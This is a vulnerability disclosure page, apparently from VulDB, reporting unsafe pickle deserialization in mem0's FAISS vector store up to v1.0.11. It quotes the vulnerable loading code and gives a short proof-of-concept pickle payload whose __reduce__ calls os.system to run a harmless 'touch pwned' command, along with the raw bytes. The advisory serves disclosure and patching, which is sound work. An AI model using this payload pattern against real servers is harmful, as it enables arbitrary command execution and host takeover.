Submit #805562: Mem0 <= v1.0.11 Unsafe Deserializationinfo

TitelMem0 <= v1.0.11 Unsafe Deserialization
Beschreibung### Summary An Unsafe Deserialization via *pickle.load()* in mem0 allows Remote Command Execution on the server host. ### Details The vulnerability is caused by the usage of vulnerable function of pickle serialization library ([faiss.py#L94](https://github.com/mem0ai/mem0/blob/97cbff77efe49a0cc0132da5c3b4a4649facc8fc/mem0/vector_stores/faiss.py#L94)). ```python import pickle # ... def _load(self, index_path: str, docstore_path: str): """ Load FAISS index and docstore from disk. Args: index_path (str): Path to FAISS index file. docstore_path (str): Path to docstore pickle file. """ try: self.index = faiss.read_index(index_path) with open(docstore_path, "rb") as f: self.docstore, self.index_to_id = pickle.load(f) logger.info(f"Loaded FAISS index from {index_path} with {self.index.ntotal} vectors") except Exception as e: logger.warning(f"Failed to load FAISS index: {e}") self.docstore = {} self.index_to_id = {} ``` ### PoC For a simple proof of concept we're using the bytes representation of pickled object below: ```python class Evil: def __reduce__(self): return (os.system, ("touch pwned",)) ``` that is: `\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch pwned\x94\x85\x94R\x94.`. Using this payload as content of the FAISS pickled file, an attacker can execute any arbitrary system command. ### Impact Usually if attackers can control the FAISS index file, they can poison or manipulate search results by injecting malicious vectors that distort nearest-neighbor retrieval. In this case, attackers can run arbitrary system commands without any restriction (e.g. they could use a reverse shell and gain access to the server). The impact is high as the attacker can completely takeover the server host. ### References - https://docs.python.org/3/library/pickle.html - https://github.com/mem0ai/mem0/issues/3778 (original advisory) - https://github.com/mem0ai/mem0/pull/4833 (patch) ### Credits Edoardo Ottavianelli (@edoardottt)
Quelle⚠️ https://github.com/mem0ai/mem0/issues/3778
Benutzer
 edoardottt (UID 94993)
Einreichung15.04.2026 08:42 (vor 2 Monaten)
Moderieren01.05.2026 11:52 (16 days later)
StatusAkzeptiert
VulDB Eintrag360550 [mem0ai mem0 bis 1.0.11 faiss.py pickle.load/pickle.dump erweiterte Rechte]
Punkte20

ZurückÜbersichtWeiter

Do you know our Splunk app?

Download it now for free!